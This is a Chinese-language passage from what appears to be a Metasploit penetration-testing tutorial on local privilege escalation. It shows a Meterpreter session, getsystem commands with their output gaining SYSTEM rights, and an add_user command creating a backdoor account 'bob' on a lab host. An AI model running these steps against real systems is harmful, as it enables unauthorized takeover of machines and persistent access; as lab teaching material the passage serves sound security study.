上一节介绍了窃取目标系统令牌，现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统，并且进行其他的操作，如创建用户和组等。本节将介绍本地权限提升。

同样的实现本地权限提升，也需要连接到Meterpreter会话，具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。

（1）启动Meterpreter会话。执行命令如下所示：

msf auxiliary(browser_autopwn) > sessions -i 1[*] Starting interaction with 1…meterpreter >

从输出的信息可以看到，成功启动了Meterpreter会话。

（2）使用getsystem命令提升本地权限。首先，查看该命令的帮助信息。执行命令如下所示：

meterpreter > getsystem -hUsage: getsystem [options]Attempt to elevate your privilege to that of local system.OPTIONS:  -h             Help Banner.  -t 
     
       The technique to use. (Default to '0').           0 : All techniques available           1 : Service - Named Pipe Impersonation (In Memory/Admin)           2 : Service - Named Pipe Impersonation (Dropper/Admin)           3 : Service - Token Duplication (In Memory/Admin)
     

输出的信息显示了getsystem命令的语法格式、作用及选项等。此时就可以根据自己的需要，使用相应的选项来提升本地权限。

（3）使用getsystem命令提升本地权限。执行命令如下所示：

meterpreter > getsystem…got system (via technique 1).meterpreter >

从输出的信息可以看到，自动选择了方法1。此时该用户就拥有了目标系统中Test用户的权限了，然后就可以做其他的操作，如创建文件、创建用户和组等。如使用该用户在目标系统上192.168.41.146创建一个名为bob的用户。执行命令如下所示：

meterpreter > add_user bob 123456 -h 192.168.41.146

执行以上命令后，可以在主机192.168.41.146上查看到创建的bob用户。